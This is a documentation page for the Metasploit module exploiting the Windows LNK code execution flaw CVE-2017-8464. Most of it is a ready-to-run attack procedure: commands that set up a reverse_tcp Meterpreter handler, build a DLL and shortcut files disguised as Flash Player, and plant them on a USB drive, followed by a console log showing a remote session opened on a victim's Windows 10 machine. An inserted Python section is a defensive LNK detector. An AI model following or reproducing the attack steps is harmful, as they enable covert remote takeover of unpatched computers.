LNK Code Execution Vulnerability - Metasploit


This page contains detailed information about how to use the exploit/windows/fileformat/cve_2017_8464_lnk_rce Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: LNK Code Execution Vulnerability
Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
Source code: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
Disclosure date: 2017-06-13
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x86, x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2015-0096, CVE-2017-8464

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. If no PATH is specified, the module will use drive letters D through Z so the files may be placed in the root path of a drive such as a shared VM folder or USB drive.
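As an added example (not code from the module or this page), a defender-side triage check in Python: it walks the ExtraData section of a shell link per MS-SHLLINK and flags a SpecialFolderDataBlock whose folder ID is the Control Panel (CSIDL_CONTROLS, 0x03), the indicator the description names. The sample LNK is constructed inline and is not a working exploit; the function and constant names are mine.

```python
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # LinkCLSID, little-endian
SPECIAL_FOLDER_SIG = 0xA0000005  # SpecialFolderDataBlock signature
CSIDL_CONTROLS = 0x0003          # folder ID of the Control Panel

def extra_data_blocks(lnk):
    """Yield (signature, body) for each ExtraData block of a shell link."""
    if len(lnk) < 0x4C or lnk[:4] != b"\x4c\x00\x00\x00" or lnk[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", lnk, 0x14)[0]
    off = 0x4C                                   # end of ShellLinkHeader
    if flags & 0x01:                             # HasLinkTargetIDList
        off += 2 + struct.unpack_from("<H", lnk, off)[0]
    if flags & 0x02:                             # HasLinkInfo
        off += struct.unpack_from("<I", lnk, off)[0]
    width = 2 if flags & 0x80 else 1             # IsUnicode -> UTF-16 characters
    for bit in (0x04, 0x08, 0x10, 0x20, 0x40):   # NAME, RELATIVE_PATH, WORKING_DIR, ARGS, ICON
        if flags & bit:
            off += 2 + width * struct.unpack_from("<H", lnk, off)[0]
    while off + 8 <= len(lnk):
        size, sig = struct.unpack_from("<II", lnk, off)
        if size < 4:                             # TerminalBlock
            break
        yield sig, lnk[off + 8:off + size]
        off += size

def points_at_control_panel(lnk):
    """True if any SpecialFolderDataBlock carries the Control Panel folder ID."""
    for sig, body in extra_data_blocks(lnk):
        if sig == SPECIAL_FOLDER_SIG and len(body) >= 4:
            if struct.unpack_from("<I", body)[0] == CSIDL_CONTROLS:
                return True
    return False

def build_sample(folder_id, name="Sample"):
    """Constructed minimal LNK (not a working exploit): header, an empty IDList,
    a Unicode NAME_STRING and a single SpecialFolderDataBlock."""
    flags = 0x01 | 0x04 | 0x80                   # HasLinkTargetIDList | HasName | IsUnicode
    header = struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0).ljust(0x4C, b"\0")
    idlist = struct.pack("<HHH", 4, 2, 0)        # IDListSize, one 2-byte item, terminator
    name_str = struct.pack("<H", len(name)) + name.encode("utf-16-le")
    block = struct.pack("<IIII", 0x10, SPECIAL_FOLDER_SIG, folder_id, 0)
    return header + idlist + name_str + block + struct.pack("<I", 0)

if __name__ == "__main__":
    print(points_at_control_panel(build_sample(CSIDL_CONTROLS)))   # True
```

Run it over every .lnk on removable media or in mail attachments to surface shortcuts whose ExtraData points at the Control Panel folder, which benign shortcuts rarely do.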

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Stability:

  • crash-service-restarts: Module may crash the service, but the service restarts.

Basic Usage


msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > show targets
    ... a list of targets ...
msf exploit(cve_2017_8464_lnk_rce) > set TARGET target-id
msf exploit(cve_2017_8464_lnk_rce) > show options
    ... show and set options ...
msf exploit(cve_2017_8464_lnk_rce) > exploit

Knowledge Base


Vulnerable Application


This vulnerability affects any Windows version without the patch for CVE-2017-8464. The exploit does not appear to work with UNC drives. Because of this, the exploit DLL file needs to be on a local file system or a USB drive. A fix was released in the June 2017 Patch Tuesday.

Vulnerable Setup


To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.

Verification Steps


Start a handler

  1. use exploit/multi/handler
  2. set PAYLOAD windows/x64/meterpreter/reverse_tcp
  3. set LHOST [ip victim connects back to]
  4. exploit -j

Run the exploit

  1. use exploit/windows/fileformat/cve_2017_8464_lnk_rce
  2. set PAYLOAD windows/x64/meterpreter/reverse_tcp
  3. set LHOST [ip victim connects back to]
  4. exploit

Copy files to USB drive & open on vulnerable system

  1. cp /root/.msf4/local/* [USB drive path]
  2. Insert device in target machine and browse to it

Options


FILENAME

The file name of the LNK file. The LNK file can be renamed later. If the value is not set, a random name will be generated.

DLLNAME

The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated.

DRIVE

Drive letter assigned to the USB drive on the victim's machine. If not set, LNK files for drives D through Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered.

Windows 10 x64 (Build 14393)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(cve_2017_8464_lnk_rce) > exploit

msf exploit(cve_2017_8464_lnk_rce) > exploit

[*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive
[*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive
[*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive
[*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive
[*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive
[*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive
[*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive
[*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive
[*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive
[*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive
[*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive
[*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive
[*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive
[*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive
[*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive
[*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive
[*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive
[*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
msf exploit(cve_2017_8464_lnk_rce) >
[*] Sending stage (1189423 bytes) to 192.168.146.193
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-5G8HK7E
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Msfconsole Usage


Here is how the windows/fileformat/cve_2017_8464_lnk_rce exploit module looks in the msfconsole:

msf6 > use exploit/windows/fileformat/cve_2017_8464_lnk_rce

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show info

       Name: LNK Code Execution Vulnerability
     Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-06-13

Provided by:
  Uncredited
  Yorick Koster
  Spencer McIntyre

Module stability:
 crash-service-restarts

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows x64
  2   Windows x86

Check supported:
  No

Basic options:
  Name      Current Setting        Required  Description
  ----      ---------------        --------  -----------
  DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
  FILENAME  Flash Player.lnk       no        The LNK file
  PATH                             no        An explicit path to where the files will be hosted

Payload information:
  Space: 2048

Description:
  This module exploits a vulnerability in the handling of Windows 
  Shortcut files (.LNK) that contain a dynamic icon, loaded from a 
  malicious DLL. This vulnerability is a variant of MS15-020 
  (CVE-2015-0096). The created LNK file is similar except an 
  additional SpecialFolderDataBlock is included. The folder ID set in 
  this SpecialFolderDataBlock is set to the Control Panel. This is 
  enough to bypass the CPL whitelist. This bypass can be used to trick 
  Windows into loading an arbitrary DLL file. If no PATH is specified, 
  the module will use drive letters D through Z so the files may be 
  placed in the root path of a drive such as a shared VM folder or USB 
  drive.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-8464
  https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
  http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
  https://msdn.microsoft.com/en-us/library/dd871305.aspx
  http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
  https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

Module Options


This is a complete list of options available in the windows/fileformat/cve_2017_8464_lnk_rce exploit:

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show options

Module options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):

   Name      Current Setting        Required  Description
   ----      ---------------        --------  -----------
   DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
   FILENAME  Flash Player.lnk       no        The LNK file
   PATH                             no        An explicit path to where the files will be hosted

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the windows/fileformat/cve_2017_8464_lnk_rce exploit:

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show advanced

Module advanced options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):

   Name                    Current Setting               Required  Description
   ----                    ---------------               --------  -----------
   ContextInformationFile                                no        The information file that contains context information
   DisablePayloadHandler   true                          no        Disable the handler code for the selected payload
   EXE::Custom                                           no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                         no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                         no        Use the default template in case the specified one is missing
   EXE::Inject             false                         no        Set to preserve the original EXE function
   EXE::OldMethod          false                         no        Set to use the substitution EXE generation method.
   EXE::Path                                             no        The directory in which to look for the executable template
   EXE::Template                                         no        The executable template file name.
   EnableContextEncoding   false                         no        Use transient context when encoding payloads
   LnkComment              Manage Flash Player Settings  yes       The comment to use in the generated LNK file
   LnkDisplayName          Flash Player                  yes       The display name to use in the generated LNK file
   MSI::Custom                                           no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                         no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                             no        The directory in which to look for the msi template
   MSI::Template                                         no        The msi template file name
   MSI::UAC                false                         no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false                         no        Enable detailed status messages
   WORKSPACE                                             no        Specify the workspace for this module
   WfsDelay                2                             no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/fileformat/cve_2017_8464_lnk_rce module can exploit:

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows x64
   2   Windows x86

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/fileformat/cve_2017_8464_lnk_rce exploit:

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show payloads

Evasion Options


Here is the full list of possible evasion options supported by the windows/fileformat/cve_2017_8464_lnk_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Authors


  • Uncredited
  • Yorick Koster
  • Spencer McIntyre

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.